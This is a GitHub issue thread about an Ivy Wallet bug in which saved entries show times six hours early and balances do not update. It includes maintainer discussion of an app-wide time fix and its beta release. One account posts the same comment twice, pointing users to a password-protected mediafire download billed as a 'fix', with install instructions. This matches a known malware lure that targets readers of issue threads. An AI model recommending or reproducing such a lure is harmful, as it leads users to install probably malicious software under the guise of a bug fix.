### ISSUE TITLE
[BUG] Incorrect Time Display and Account Balance Issue(critical issue)

### ISSUE THREAD

**Issue by asadmash** [Ivy-Apps/ivy-wallet#3434]
### Please confirm the following

- [X] I checked [the current issues](https://github.com/Ivy-Apps/ivy-wallet/issues) for duplicate problems

### Describe the bug

When adding a new entry, the entry time initially shows the current time, but after clicking 'Add,' it displays a time that is 6 hours earlier. Additionally, if the timing is changed manually, the entry reflects the correct time. However, the income, expenses, or transfer amounts do not update the account balance accordingly.

### To Reproduce

1. Add a new entry with the default time (current time).
2. Click 'Add' to save the entry.
3. Observe that the entry time now shows a time that is 6 hours earlier.
4. Manually adjust the time of the entry.
5. Observe that the entry now shows the correct time.
6. Check the account balance to see if the income, expenses, or transfer amounts have been updated.

### Expected behavior

The entry time should remain consistent with the current time unless manually changed.

The account balance should be correctly updated based on the income, expenses, or transfer amounts entered.

### App version

v2024.08.25(195) from play store & latest demo apk from TG.

### Smartphone

symphony z40, android 10

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ivywallet** [comment]
⚠️ Hey @rodrigomatosc, this issue is **not approved**, yet.
@ILIYANGERMANOV must approve it first.

Also, make sure to read our [Contribution Guidelines](https://github.com/Ivy-Apps/ivy-wallet/blob/main/CONTRIBUTING.md).

**Comment by ILIYANGERMANOV** [comment]
Appreciate. Hey @rodrigomatosc @shamim-emon I'm also working on the time problems in general. I'm trying to apply an app-wide fix. However, feel free to give these a shot - just heads up that we might have merge conflicts

**Comment by shamim-emon** [comment]
> Appreciate. Hey @rodrigomatosc @shamim-emon I'm also working on the time problems in general. I'm trying to apply an app-wide fix. However, feel free to give these a shot - just heads up that we might have merge conflicts 

Alright!

**Comment by shamim-emon** [comment]
> Appreciate. Hey @rodrigomatosc @shamim-emon I'm also working on the time problems in general. I'm trying to apply an app-wide fix. However, feel free to give these a shot - just heads up that we might have merge conflicts 

It'd be even better if we could split modules among ourselves?
What do you say @ILIYANGERMANOV?

**Comment by ILIYANGERMANOV** [comment]
> > Appreciate. Hey @rodrigomatosc @shamim-emon I'm also working on the time problems in general. I'm trying to apply an app-wide fix. However, feel free to give these a shot - just heads up that we might have merge conflicts
> 
> It'd be even better if we could split modules among ourselves? What do you say @ILIYANGERMANOV?

It's hard to split because you change one place to `Instant` the entire app wont' build :/ The change will propagate among all usages. I think to work a couple of hours today will make some buildable progress. if you want you can start building on top of it. Here's my PR:
https://github.com/Ivy-Apps/ivy-wallet/pull/3435

I created the APIs that we should use across the app.

**Comment by asadmash** [comment]
Problem solved. Thanks to the developers and contributors.🤍

**Comment by asadmash** [comment]
Problem solved. Thanks to the developers and contributors.🤍

**Comment by 5VPH3R** [comment]
When will the fix be merged so we can receive the update via Google Play Store?

**Comment by 5VPH3R** [comment]
> Problem solved. Thanks to the developers and contributors.🤍

Hello @asadmash
The fix still didn't reach us on Google Play Store
I'm still facing issues on GMT +3
Any ETA for getting the fix?

**Comment by ILIYANGERMANOV** [comment]
> > Problem solved. Thanks to the developers and contributors.🤍
> 
> Hello @asadmash The fix still didn't reach us on Google Play Store I'm still facing issues on GMT +3 Any ETA for getting the fix?

It's on Google Play Beta
